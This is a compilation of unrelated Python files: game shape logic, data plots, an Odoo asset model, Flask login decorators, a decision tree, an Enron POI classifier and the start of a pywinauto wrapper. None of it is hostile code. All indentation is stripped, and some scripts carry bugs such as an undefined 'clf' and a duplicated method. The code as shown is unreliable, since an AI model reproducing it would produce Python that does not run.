def __init__(self, name, x, y, xcells, ycells, xsize, ysize, cells=None, **kwargs):
super(Shape, self).__init__()
self.name = name
self.gridx = x
self.gridy = y
self.xcells = xcells
self.ycells = ycells
self.xsize = xsize
self.ysize = ysize
self.dx = xcells * xsize
self.dy = ycells * ysize
self.cells = cells if cells else []
self.move = kwargs.get("move", Move())
self.pushed = kwargs.get("pushed", None)
self.color = kwargs.get("color", Color.BLACK)
self.gravity = kwargs.get("gravity", True)
self.allow_rotation = (
kwargs.get("rotation", True) if (self.xcells == self.ycells) else False
)
self.allow_key_handle = kwargs.get("hkey", False)
self.transient = kwargs.get("transient", False)
self.gravity_step = False
self.is_rotation = False
self.dx_move = xsize
self.dy_move = ysize
self.move_actions = []
for cell in self.cells:
cell.incr_xy(self.gridx, self.gridy)
cell.move = self.move
def __str__(self):
return f"[{self.gid}] : {self.__class__.__name__}@{self.name} | {self.gridx} {self.gridy} {self.cells}"
def add_cell(self, cell):
"""add_cell add a new cell to the shape.
"""
cell.incr_xy(self.gridx, self.gridy)
cell.move = self.move
self.cells.append(cell)
def del_cell(self, cell):
"""del_cell deletes a cell from the shape.
"""
if cell in self.cells:
self.cells.remove(cell)
def move_it(self, dx, dy, update=True):
"""move_it moves a shape the given X and Y offsets. Grid position
and graphical position are stored and move delta is stored. It moreover
updates gridx and gridy attributes if update flag is True.
"""
self.is_rotation = False
if update:
self.gridx += dx
self.gridy += dy
for cell in self.cells:
cell.move_it(dx, dy)
def back_it(self):
"""back_it moves back all cells in the shape move. It basically the
reverse operation for move_it().
"""
result = []
for cell in self.cells:
result.append(cell.back_it())
# Rotation does not update grid position, so they should not be changed
# back now.
if not self.is_rotation:
backx, backy = result[-1]
self.gridx -= backx
self.gridy -= backy
return result
def rotate_clockwise(self):
"""rotate_clockwise rotates the shape by 90 degrees clockwise.
"""
if not self.allow_rotation:
return
self.is_rotation = True
for cell in self.cells:
gridx = cell.gridx - self.gridx
gridy = cell.gridy - self.gridy
deltax = self.xcells - 1 - gridy - gridx
deltay = gridx - gridy
cell.move_it(deltax, deltay)
def rotate_anticlockwise(self):
"""rotate_anticlockwise rotates the shape by 90 degrees anti-clockwise.
"""
if not self.allow_rotation:
return
self.is_rotation = True
for cell in self.cells:
gridx = cell.gridx - self.gridx
gridy = cell.gridy - self.gridy
deltay = self.xcells - 1 - gridx - gridy
deltax = gridy - gridx
cell.move_it(deltax, deltay)
def start_tick(self):
"""start_tick should set all elements ready for a new tick.
"""
self.move_actions = []
def end_tick(self):
"""end_tick shoudl set all elements ready for the end of a tick. Any
structure to be clean up can be done at this point.
"""
pass
def handle_keyboard_event(self, event):
"""handle_keyboard_event should process the keyboard event given.
"""
if not self.allow_key_handle:
return
self.gravity_step = False
if event.key == pygame.K_LEFT:
self.move_it(-1, 0)
if event.key == pygame.K_RIGHT:
self.move_it(1, 0)
if event.key == pygame.K_UP:
self.move_it(0, -1)
if event.key == pygame.K_DOWN:
self.move_it(0, 1)
if event.key == pygame.K_SPACE:
self.rotate_clockwise()
def handle_mouse_event(self, event):
"""handle_mouse_event should process the mouse event given.
Mouse events are passed to the active scene to be handle.
"""
pass
def gravity_move(self, steps):
"""gravity_move represents a gravity movement down the board for the
given number of steps. This movement can be called only one time for
every tick.
"""
if not self.gravity_step:
self.gravity_step = True
# self.move_it(0, steps)
self.move_actions.append({"call": self.move_it, "args": (0, steps)})
def handle_custom_event(self, event):
"""handle_custom_event should process pygame custom event given.
Any object in the game, like, scene, graphic objects, ... can post
customs events, and those should be handled at this time.
"""
if self.gravity and event.type == GEvent.T_GRAVITY:
self.gravity_move(1)
def get_collision_box(self):
"""get_collision_box retrieves collision box for all cells containes
in the shape.
"""
collision_box = CollisionBox()
for cell in self.cells:
collision_box.update(cell.get_collision_box())
return collision_box
def out_of_bounds_x_response(self):
"""out_of_bounds_x_response takes action when the graphical object is
out of bound at the X-axis.
Return True if objects is lost out of bound or False if object should
be in bounds.
"""
return self.out_of_bounds_response()
def out_of_bounds_y_response(self):
"""out_of_bounds_x_response takes action when the graphical object is
out of bound at the X-axis.
Return True if objects is lost out of bound or False if object should
be in bounds.
"""
return self.out_of_bounds_response()
def out_of_bounds_response(self):
"""out_of_bounds_x_response takes action when the graphical object is
out of bound at the X-axis or Y-axis
Return True if objects is lost out of bound or False if object should
be in bounds.
"""
for cell in self.cells:
cell.back_it()
def collide_with(self, other, collision):
"""collide_with processes a collision with other object.
"""
for cell in self.cells:
cell.back_it()
def update(self, surface, **kwargs):
"""update provides any functionality to be done every tick.
"""
for cell in self.cells:
cell.update(surface, **kwargs)
def render(self, surface, **kwargs):
"""render should draws the instance on the given surface.
"""
self.gravity_step = False
for cell in self.cells:
cell.render(surface, **kwargs)
|
from batch_main import get_readings_by_date, build_csv, run
from test.fixtures import BaseTest
from run import run as main_run
import datetime
class TestBatch(BaseTest):
"""Test the batch functionality."""
def setUp(self):
"""Setup the sensors and run the sensors."""
super().setUp()
main_run(self.sensor1.id, self.sensor2.id)
self.cob_date = datetime.datetime.utcnow().date()
def test_get_readings(self):
readings = get_readings_by_date(self.sensor1.id, self.sensor2.id, cob_date=self.cob_date)
self.assertEqual(6, len(readings))
self.assertTrue(readings[0].created_date > readings[5].created_date)
readings = get_readings_by_date(self.sensor1.id, self.sensor2.id, cob_date=datetime.date(1970, 1, 1))
self.assertEqual(0, len(readings))
def test_build_csv(self):
readings = get_readings_by_date(self.sensor1.id, self.sensor2.id, cob_date=self.cob_date)
self.assertEqual(7, len(build_csv(readings).getvalue().splitlines()))
def test_send_email(self):
run(self.sensor1.id, self.sensor2.id, cob_date=self.cob_date)
|
# This file is part of Adblock Plus <https://adblockplus.org/>,
# Copyright (C) 2006-present eyeo GmbH
#
# Adblock Plus is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# Adblock Plus is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Adblock Plus. If not, see <http://www.gnu.org/licenses/>.
#
#Setup script adapted to work with our new plugin flake8-Smart.
#
from __future__ import print_function
import os
import glob
import tokenize
import sys
import re
import subprocess
from setuptools import setup, Command
class TestCommand(Command):
user_options = []
def _get_expected_errors(self, filename):
errors = set()
def tokeneater(kind, token, start, end, line):
if kind == tokenize.COMMENT:
match = re.search(r'^#+[*\s]*(A\d+)', token)
if match:
try:
offset = token.index('*')
except ValueError:
offset = 0
errors.add((start[0] + 1,
start[1] + 1 + offset,
match.group(1)))
with open(filename, 'rb') as file:
if sys.version_info[0] >= 3:
for token in tokenize.tokenize(file.readline):
tokeneater(*token)
else:
tokenize.tokenize(file.readline, tokeneater)
return errors
def _get_reported_errors(self, filename):
output = subprocess.Popen(['flake8', filename],
stdout=subprocess.PIPE).communicate()[0]
errors = set()
for line in output.decode('utf-8').splitlines():
_, lineno, colno, error = line.split(':', 3)
errors.add((int(lineno), int(colno), error.split()[0]))
return errors
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
directory = os.path.dirname(__file__)
filenames = glob.glob(os.path.join(directory, 'tests', '*.py'))
failed = False
for filename in sorted(filenames):
expected = self._get_expected_errors(filename)
reported = self._get_reported_errors(filename)
failures = expected ^ reported
if not failures:
print(filename + ': OK')
continue
for record in sorted(failures):
lineno, colno, error = record
print('{}:{}:{}: '.format(filename, lineno, colno), end='')
if record in expected:
print(error + ' expected')
else:
print('unexpected ' + error)
failed = True
if failed:
sys.exit(1)
setup(
name='flake8-Smart',
version='0.1',
py_modules=['flake8_Smart'],
install_requires=['flake8>=3.2.1'],
entry_points={
'flake8.extension': [
'A = flake8_Smart:check_ast',
'A1 = flake8_Smart:check_quotes',
'A111 = flake8_Smart:check_redundant_parenthesis',
'A303 = flake8_Smart:check_non_default_encoding'
],
},
cmdclass={'test': TestCommand}
)
|
from ctypes import *
class __sha1_context(Structure):
_fields_=[
("startCharOffset", c_uint16),
("endCharOffset", c_uint16),
("fontID", c_uint16),
("style_flags", c_char),
("font_size", c_char),
("text_color", c_int)
] |
import random
from itertools import count
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
plt.style.use('fivethirtyeight')
x_vals = []
y_vals = []
index = count()
# def animate(i):
# x_vals.append(next(index))
# y_vals.append(random.randint(0, 5))
# plt.cla()
# plt.plot(x_vals, y_vals, colors = )
def animate(i):
data = pd.read_csv('data.csv')
x = data['x_value']
y1 = data['total_1']
y2 = data['total_2']
median1 = y1.median()
median2 = y2.median()
plt.cla()
plt.plot(x, y1, label = "Channel 1")
plt.plot(x, y2, label = "Channel 2")
plt.axhline(median1, color = "#000000", label = "Channel 1 median")
plt.axhline(median2, color = "#111111", label = "Channel 2 median")
plt.legend(loc = "upper right") #location for constant location
plt.tight_layout()
ani = FuncAnimation(plt.gcf(), animate, interval = 1000)
plt.show()
|
# -*- coding: utf-8 -*-
from odoo import models, fields, api
import time
import logging
_logger = logging.getLogger(__name__)
import datetime
class Asset(models.Model):
_name = 'account.asset.asset'
_inherit = ['account.asset.asset','mail.thread']
pengadaan = fields.Selection(
selection=[
('PO', 'PO'),
('Pembelian Langsung', 'Pembelian Langsung')],
string='Metode Pengadaan',
required="true")
sertifikat = fields.Selection(
selection=[
('SHM', 'SHM'),
('HGB', 'HGB')],
string='Jenis Sertifikat')
processor = fields.Char(
string='Processor',
size=50,
required=False)
harddisk = fields.Char(
string='Harddisk')
memory = fields.Char(
string='Memory')
budget = fields.Char(
string='Budget')
kd_wilayah = fields.Char(
string='Kode Wilayah')
no_polisi = fields.Char(
string='No. Polisi')
tgl_pajak = fields.Date(
string='Tanggal Pajak dan STNK',
default=lambda *a : time.strftime("%Y-%m-%d"))
tgl_asuransi = fields.Date(
default=lambda *a : time.strftime("%Y-%m-%d"),
string='Tanggal Asuransi')
tanah = fields.Integer(
string='Luas Tanah')
bangunan = fields.Integer(
string='Luas Bangunan')
no_sertifikat = fields.Char(
string='Nomor Sertifikat')
tgl_sertifikat = fields.Date(
default=lambda *a : time.strftime("%Y-%m-%d"),
string='Tanggal Sertifikat')
alamat = fields.Text(
string='Alamat')
tgl_jt_pajak = fields.Date(
string='Tanggal Jatuh Tempo Pajak',
default=lambda *a : time.strftime("%Y-%m-%d"))
tgl_jt_asuransi = fields.Date(
string='Tanggal Jatuh Tempo Asuransi',
default=lambda *a : time.strftime("%Y-%m-%d"))
def cek_jatuh_tempo(self):
_logger.info('proses cek jatuh tempo.....')
sql = "select id,name,tgl_jp_pajak from account_asset_asset where tgl_jp_pajak = %s"
# date_jt = hari + 10 hari
date_jt = datetime.datetime.now() + datetime.timedelta(days=10)
cr = self.env.cr
cr.execute(sql , (date_jt.strftime("%Y-%m-%d"),))
res = cr.fetchall()
def cek_jatuh_tempo(self):
_logger.info('proses cek jatuh tempo.....')
# date_jt = hari + 10 hari
date_jt = datetime.datetime.now() + datetime.timedelta(days=10)
assets = self.env['account.asset.asset'].search([('tgl_jp_pajak','=',date_jt)])
for asset in assets:
asset.message_post(body="Asset ini akan jatuh tempo 10 hari lagi",
message_type='comment',
subtype='mail.mt_comment') |
from django import forms
from . import models
class PalavraForm(forms.ModelForm):
class Meta:
model = models.Palavra
fields = ['palavra']
labels = {
'palavra': 'Palavra',
} |
# Importing all needed Flask classes
from flask import Flask, session, flash, redirect, url_for
# Importing wraps
from functools import wraps
# Creating logged in required function
def login_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'account' in session:
return f(*args, **kwargs)
else:
# Displaying flash function
flash("You need to login first")
# Redirecting User
return redirect(url_for('users.login'))
return wrap
# Creating logged in required function
def login_required_early(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'account' in session:
return f(*args, **kwargs)
else:
# Displaying flash function
flash("You need to login first")
# Redirecting User
return redirect(url_for('admin.login'))
return wrap |
import csv
import matplotlib.pyplot as plt
from datetime import datetime
filename = 'chennai_reservoir_rainfall.csv'
fields = []
Date = []
POONDI = []
CHOLAVARAM = []
REDHILLS = []
CHEMBARAMBAKKAM = []
with open(filename, 'r') as csvfile:
csvreader = csv.reader(csvfile)
fields = next(csvreader)
for row in csvreader:
for val in row:
if not val:
print("There is a Null value")
date = datetime.strptime(row[0], '%d-%m-%Y').strftime('%Y-%m-%d')
Date.append(date)
POONDI.append(float(row[1]))
CHOLAVARAM.append(float(row[2]))
REDHILLS.append(float(row[3]))
CHEMBARAMBAKKAM.append(float(row[4]))
po = []
cho = []
red = []
chem = []
cnt = 0
while cnt < len(Date) :
if int(Date[cnt][:4]) % 4 == 0:
po.append(sum(POONDI[cnt:cnt+366]))
cho.append(sum(CHOLAVARAM[cnt:cnt+366]))
red.append(sum(REDHILLS[cnt:cnt+366]))
chem.append(sum(CHEMBARAMBAKKAM[cnt:cnt+366]))
cnt += 366
else:
po.append(sum(POONDI[cnt:cnt+365]))
cho.append(sum(CHOLAVARAM[cnt:cnt+365]))
red.append(sum(REDHILLS[cnt:cnt+365]))
chem.append(sum(CHEMBARAMBAKKAM[cnt:cnt+365]))
cnt += 365
d = []
for i in range(len(po)):
d.append(2004+i)
#rainfall on each reservoir over repective years
plt.bar(d, po)
plt.locator_params(axis="x", nbins=17)
plt.xlabel("Year")
plt.ylabel("mm (unit for measuring rain)")
plt.title("Chennai Reservoir Rianfall for POONDI")
plt.show()
plt.bar(d, cho)
plt.locator_params(axis="x", nbins=17)
plt.xlabel("Year")
plt.ylabel("mm (unit for measuring rain)")
plt.title("Chennai Reservoir Rianfall for CHOLAVARAM")
plt.show()
plt.bar(d, red)
plt.locator_params(axis="x", nbins=17)
plt.xlabel("Year")
plt.ylabel("mm (unit for measuring rain)")
plt.title("Chennai Reservoir Rianfall for REDHILLS")
plt.show()
plt.bar(d, chem)
plt.locator_params(axis="x", nbins=17)
plt.xlabel("Year")
plt.ylabel("mm (unit for measuring rain)")
plt.title("Chennai Reservoir Rianfall for CHEMBARAMBAKKAM")
plt.show()
total = []
for i in range(len(po)):
t = po[i]+cho[i]+red[i]+chem[i]
total.append(t)
#total rainfall over repective years
plt.bar(d, total)
plt.locator_params(axis="x", nbins=17)
plt.xlabel("Year")
plt.ylabel("Million Cubic Feet")
plt.title("Total Rainfall Over Respective Years")
plt.show()
|
from numpy import *
from math import log
import operator
######################################################################
#
# 说明:
# 计算信息熵
# 参数:
# datas[in][list]:输入数据集
#
def calc_shannon_ent(datas):
# 计算数据集中各分类数目
classes = {}
for line in datas:
class_type = line[-1]
classes[class_type] = classes.get(class_type, 0) + 1
# 计算香农熵
# H = -Σp(xi)log(p(xi))
row = len(datas)
shannon_ent = 0.0
for key in classes:
prob = float(classes[key]) / row
shannon_ent -= prob * log(prob, 2)
return shannon_ent
#
# 说明:
# 划分数据集。将数据集datas按照属性feac划分为各个子集
# 参数:
# datas[in][list]:待划分数据集
# feac_index[in]:要划分的属性值索引
# value[in]:本次划分出的子集的feac值
# new_datas[out]:按照feac=value划分出的子集
#
def split_datas(datas, feac_index, value):
new_datas = []
for line in datas:
if line[feac_index] == value:
reduced_line = line[:feac_index]
reduced_line.extend(line[feac_index + 1:])
new_datas.append(reduced_line)
return new_datas
#
# 说明:
# 寻找最佳特征用于划分
#
def choose_best_feac(datas):
best_gain = 0.0
best_feac = -1
feac_num = len(datas[0]) - 1
# 计算父数据集香农熵
base_ent = calc_shannon_ent(datas)
# 依次计算按照每个特征划分后的香农熵
# 找出获得最大信息增益的特征
for feac in range(feac_num):
# 统计该特征所有可能值
feac_list = [example[feac] for example in datas]
feac_unique = set(feac_list)
# 按所有可能值对该特征划分子集,并计算子集上的香农熵
# 子集香农熵 = 各个子集划分比例 * 各个子集数据香农熵
sub_ent = 0.0
for value in feac_unique:
sub_datas = split_datas(datas, feac, value)
prob = len(sub_datas) / float(len(datas))
sub_ent += prob * calc_shannon_ent(sub_datas)
# 计算该特征的信息增益,如果按该特征划分获得的信息增益最好则记录
gain = base_ent - sub_ent
if gain > best_gain:
best_gain = gain
best_feac = feac
return best_feac
#
# 说明:
# 返回频率最高的类别。
#
def majority_cnt(classes):
classes_count = {}
for key in classes:
classes_count[key] = classes_count.get(key, 0) + 1
sorted_classes_count = sorted(classes_count.iteritems(), key=operator.itemgetter(1),reverse=True)
return sorted_classes_count[0][0]
#
# 说明:
# 创建决策树
# 参数:
# datas[in][list]:数据样本集
# feac_descs[in][list]:特征名称,仅用于标注
# tree[out][map]:返回的决策树,各节点保存为[map]类型
#
def create_tree(datas, feac_descs):
# 返回条件:数据集中所有样本属于同一类,返回此类别
datas_classes = [example[-1] for example in datas]
if datas_classes.count(datas_classes[0]) == len(datas_classes):
return datas_classes[0]
# 返回条件:没有可继续划分的特征,返回数目最多的类标签
if len(datas[0]) == 1:
return majority_cnt(datas_classes)
# 选择最佳划分特征
best_feac = choose_best_feac(datas)
best_feac_desc = feac_descs[best_feac]
del(feac_descs[best_feac])
# 按最佳特征的所有可能值划分
tree = {best_feac_desc: {}}
feac_values = [example[best_feac] for example in datas]
feac_unique = set(feac_values)
for value in feac_unique:
sub_datas = split_datas(datas, best_feac, value)
sub_feac_descs = feac_descs[:]
tree[best_feac_desc][value] = create_tree(sub_datas, sub_feac_descs)
return tree
if __name__ == '__main__':
fr = open("lenses.txt")
lenses = [inst.strip().split('\t') for inst in fr.readlines()]
descs = ["age", "prescript", "astigmatic", "tearRate"]
tree = create_tree(lenses, descs)
print(tree)
|
import csv
from clasemanejadorpersona import manejadorpersona
from clasemanejadortaller import manejadortaller
from clasemanejadorinscrip import manejadorins
def menu():
print('1 - añadir persona')
print('2 - buscar dni y mostrar taller y lo que adeuda')
print('3 - buscar id taller listar persona')
print('4 - ingresar dni y dar de alta')
print('5 - crear archivo de inscripciones')
if __name__ == '__main__':
manejatalleres = manejadortaller()
manejapersona = manejadorpersona()
manejain = manejadorins()
band = True
while band == True:
print('ingresar opcion')
menu()
op = input()
if op == '1':
manejapersona.añadir(manejain)
elif op == '2':
manejain.buscar()
elif op == '3':
manejain.mostrartaller()
elif op == '4':
manejain.alta()
elif op == '5':
manejain.escribir()
else:
band = False
print('termino programa')
|
# -*- coding: utf-8 -*-
def cubes_with_x_digits(x):
from math import ceil, floor
lower = floor((10 ** (x - 1)) ** (1. / 3))
upper = ceil((10 ** x - 1) ** (1. / 3))
for i in range(lower, upper):
yield i ** 3
def sort_digits(n):
return ''.join([str(x) for x in sorted(str(n))])
digits = 3
while True:
cubes = [x for x in cubes_with_x_digits(digits)]
cube_repr = [sort_digits(x) for x in cubes]
repr_cnt = [cube_repr.count(x) >= 5 for x in cube_repr]
if any(repr_cnt):
print([x[0] for x in zip(cubes, repr_cnt) if x[1]])
break
digits += 1
|
#!/usr/bin/python
import sys
import pickle
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
sys.path.append("../tools/")
from feature_format import featureFormat, targetFeatureSplit
from tester import dump_classifier_and_data,test_classifier
from sklearn.pipeline import Pipeline,FeatureUnion
from sklearn.feature_selection import SelectKBest
from sklearn.model_selection import GridSearchCV
from sklearn.ensemble import IsolationForest,RandomForestClassifier,AdaBoostClassifier
from sklearn.preprocessing import StandardScaler,MinMaxScaler
from sklearn.neighbors import LocalOutlierFactor,NearestNeighbors,KNeighborsClassifier
from sklearn.metrics import recall_score,precision_score,accuracy_score,f1_score
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.cross_validation import train_test_split
from sklearn.decomposition import PCA
### Task 1: Select what features you'll use.
### features_list is a list of strings, each of which is a feature name.
### The first feature must be "poi".
features_list = ['poi', 'salary', 'bonus', 'long_term_incentive', 'deferred_income',
'loan_advances', 'other', 'expenses','director_fees',
'exercised_stock_options', 'restricted_stock',
'total_stock_value', 'to_messages', 'from_messages', 'from_this_person_to_poi',
'from_poi_to_this_person', 'shared_receipt_with_poi'] # You will need to use more features
### Load the dictionary containing the dataset
with open("final_project_dataset.pkl", "r") as data_file:
data_dict = pickle.load(data_file)
pd.set_option('display.max_columns', None)
##convert to pandas dataframe
df=pd.DataFrame.from_dict(data_dict,orient='index')
df.replace('NaN',0.0,inplace= True)
### Task 3: Create new feature(s)
df['fraction_from_poi'] = df['from_poi_to_this_person'] / df['to_messages']
df['fraction_to_poi'] = df['from_this_person_to_poi'] / df['from_messages']
df['fraction_bonus']= df['bonus'] / df['total_payments']
df['bonus_to_salary'] = df['bonus']/df['salary']
data_dict = df.fillna(value='NaN').to_dict(orient='index')
### Task 2: Remove outliers
def deloutliers(dictionary,data,contamination=0.02):
out=LocalOutlierFactor(contamination=contamination)
labels, features = targetFeatureSplit(data)
for key,val in zip(dictionary.keys(),out.fit_predict(features,labels)):
if val==-1:
del dictionary[key]
return dictionary
data_dict.pop('TOTAL',0)
data_dict.pop('THE TRAVEL AGENCY IN THE PARK')
data_dict.pop('LOCKHART EUGENE E') #this key does not contain any value to its feature
data_dict = deloutliers(data_dict,featureFormat(data_dict, features_list,sort_keys = True))
### Store to my_dataset for easy export below.
my_dataset = data_dict
### Extract features and labels from dataset for local testing
data = featureFormat(data_dict, features_list,sort_keys = True)
labels, features = targetFeatureSplit(data)
##clf=AdaBoostClassifier()
##clf.fit(features_train,labels_train)
##tree_feature_importances = (clf.feature_importances_)
##tree_features = zip(tree_feature_importances, features_list[1:])
##tree_features = sorted(tree_features, key= lambda x:x[0], reverse=True)
##
### Display the feature names and importance values
##print('Tree Feature Importances:\n')
##for i in range(10):
## print('{} : {:.4f}'.format(tree_features[i][1], tree_features[i][0]))
### Task 4: Try a varity of classifiers
### Please name your classifier clf for easy export below.
### Note that if you want to do PCA or other multi-stage operations,
### you'll need to use Pipelines. For more info:
### http://scikit-learn.org/stable/modules/pipeline.html
# Provided to give you a starting point. Try a variety of classifiers.
#feature selection using PCA
'''
data = featureFormat(my_dataset, features_list, sort_keys = True)
labels, features = targetFeatureSplit(data)
pca_svm = Pipeline([('kbest',SelectKBest()),('scaler',StandardScaler()),('svm',SVC())])
param_grid = ([{'kbest__k': [3,4,5,6],
'svm__C': [1000,10000],
'svm__gamma': [0.01,0.0001],
'svm__degree':[2,3],
'svm__kernel': ['linear','rbf','poly']}])
svm_clf = GridSearchCV(pca_svm,param_grid,scoring='recall').fit(features,labels).best_estimator_
pca_knb = Pipeline([('pca',PCA(n_components=2)),('scaler',StandardScaler()),('knb',KNeighborsClassifier())])
param_grid = ([{'knb__n_neighbors': [4,5,6]}])
knb_clf = GridSearchCV(pca_knb,param_grid,scoring='recall').fit(features,labels).best_estimator_
pca_rfst = Pipeline([('pca',PCA(n_components=2)),('scaler',StandardScaler()),
('rfst',RandomForestClassifier())])
param_grid = ([{'rfst__n_estimators': [4,5,6]}])
rfst_clf = GridSearchCV(pca_rfst,param_grid,scoring='recall').fit(features,labels).best_estimator_
pca_tree = Pipeline([('pca',PCA(n_components=2)),('scaler',StandardScaler()),('tree',DecisionTreeClassifier())])
param_grid = ([{'tree__criterion':['gini','entropy'],
'tree__min_samples_split' :[2,4,6,8,10,20],
'tree__max_features' : [None,'sqrt','log2','auto']}])
tree_clf = GridSearchCV(pca_tree,param_grid,scoring='recall').fit(features,labels).best_estimator_
print svm_clf
test_classifier(svm_clf,my_dataset,features_list)
print knb_clf
test_classifier(knb_clf,my_dataset,features_list)
print rfst_clf
test_classifier(rfst_clf,my_dataset,features_list)
print tree_clf
test_classifier(tree_clf,my_dataset,features_list)'''
#feature selection using SelectKBest
'''eng_svm = Pipeline([('scaler',StandardScaler()),('kbest',SelectKBest()),('svm',SVC())])
param_grid = ([{'kbest__k':[3,4,5,6],
'svm__C': [1,10,100,1000],
'svm__gamma': [1,0.1,0.01,0.001],
'svm__degree':[2,3,4],
'svm__kernel': ['linear','rbf','poly']}])
svm_clf = GridSearchCV(eng_svm,param_grid,scoring='recall').fit(features,labels).best_estimator_
eng_knb = Pipeline([('scaler',StandardScaler()),('kbest',SelectKBest()),('knb',KNeighborsClassifier())])
param_grid = ([{'kbest__k':[3,4,5,6],'knb__n_neighbors': [2,3,4,5,6]}])
knb_clf = GridSearchCV(eng_knb,param_grid,scoring='recall').fit(features,labels).best_estimator_
eng_rfst = Pipeline([('scaler',StandardScaler()),('kbest',SelectKBest()),
('rfst',RandomForestClassifier())])
param_grid = ([{'kbest__k':[3,4,5,6],'rfst__n_estimators': [2,3,4,5,6]}])
rfst_clf = GridSearchCV(eng_rfst,param_grid,scoring='recall').fit(features,labels).best_estimator_
eng_tree = Pipeline([('kbest',SelectKBest()),('scaler',StandardScaler()),('tree',DecisionTreeClassifier())])
param_grid = ([{'kbest__k':[3,4,5,6],
'tree__criterion':['gini','entropy'],
'tree__min_samples_split' :[2,4,6,8,10,20],
'tree__max_features' : [None,'sqrt','log2','auto']}])
tree_clf = GridSearchCV(eng_tree,param_grid,scoring='recall').fit(features,labels).best_estimator_
print svm_clf
test_classifier(svm_clf,my_dataset,features_list)
print knb_clf
test_classifier(knb_clf,my_dataset,features_list)
print rfst_clf
test_classifier(rfst_clf,my_dataset,features_list)
print tree_clf
test_classifier(tree_clf,my_dataset,features_list)
'''
#Hybrid feature selection using feature union that combines PCA and SelectKBest
combined_features = FeatureUnion([("pca", PCA()), ("kbest", SelectKBest())])
hybrid_svm = Pipeline([('features',combined_features),('scaler',StandardScaler()),('svm',SVC())])
param_grid = ([{'features__pca__n_components':[2,3,4,5,6,7],'features__kbest__k':[2,3,4,5,6,7],
'svm__C': [1,10,100,1000],
'svm__gamma': [1,0.1,0.01,0.001],
'svm__degree':[2,3,4],
'svm__kernel': ['rbf','poly']}])
svm_clf = GridSearchCV(hybrid_svm,param_grid,scoring='recall').fit(features,labels).best_estimator_
hybrid_knb = Pipeline([('features',combined_features),('scaler',StandardScaler()),('knb',KNeighborsClassifier())])
param_grid = ([{'features__pca__n_components':[2,3,4,5,6],'features__kbest__k':[2,3,4,5,6],'knb__n_neighbors': [1,2,3,4,5,6,7]}])
knb_clf = GridSearchCV(hybrid_knb,param_grid,scoring='recall').fit(features,labels).best_estimator_
hybrid_rfst = Pipeline([('features',combined_features),('scaler',StandardScaler()),
('rfst',RandomForestClassifier())])
param_grid = ([{'features__pca__n_components':[2,3,4,5,6],'features__kbest__k':[2,3,4,5,6],'rfst__n_estimators': [2,3,4,5,6,7]}])
rfst_clf = GridSearchCV(hybrid_rfst,param_grid,scoring='recall').fit(features,labels).best_estimator_
print svm_clf
test_classifier(svm_clf,my_dataset,features_list)
print knb_clf
test_classifier(knb_clf,my_dataset,features_list)
print rfst_clf
test_classifier(rfst_clf,my_dataset,features_list)
### Task 5: Tune your classifier to achieve better than .3 precision and recall
### using our testing script. Check the tester.py script in the final project
### folder for details on the evaluation method, especially the test_classifier
### function. Because of the small size of the dataset, the script uses
### stratified shuffle split cross validation. For more info:
### http://scikit-learn.org/stable/modules/generated/sklearn.cross_validation.StratifiedShuffleSplit.html
# Example starting point. Try investigating other evaluation techniques!
features_train, features_test, labels_train, labels_test = train_test_split(features, labels, test_size=0.3, random_state=42)
### Task 6: Dump your classifier, dataset, and features_list so anyone can
### check your results. You do not need to change anything below, but make sure
### that the version of poi_id.py that you submit can be run on its own and
### generates the necessary .pkl files for validating your results.
dump_classifier_and_data(clf, my_dataset, features_list)
|
# GUI Application automation and testing library
# Copyright (C) 2006-2017 Mark Mc Mahon and Contributors
# https://github.com/pywinauto/pywinauto/graphs/contributors
# http://pywinauto.readthedocs.io/en/latest/credits.html
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of pywinauto nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Basic wrapping of Linux ATSPI elements"""
from __future__ import unicode_literals
from __future__ import print_function
import six
from .. import backend
from ..base_wrapper import BaseWrapper
from ..base_wrapper import BaseMeta
from ..linux.atspi_element_info import AtspiElementInfo
from Xlib import Xatom
from Xlib.display import Display
# region PATTERNS
# ====================================================================
class InvalidWindowHandle(RuntimeError):
"""Raised when an invalid handle is passed to AtspiWrapper"""
def __init__(self, hwnd):
"""Initialise the RuntimeError parent with the mesage"""
RuntimeError.__init__(self,
"Handle {0} is not a vaild window handle".format(hwnd))
# =========================================================================
class AtspiMeta(BaseMeta):
"""Metaclass for AtspiWrapper objects"""
control_type_to_cls = {}
def __init__(cls, name, bases, attrs):
"""Register the control types"""
BaseMeta.__init__(cls, name, bases, attrs)
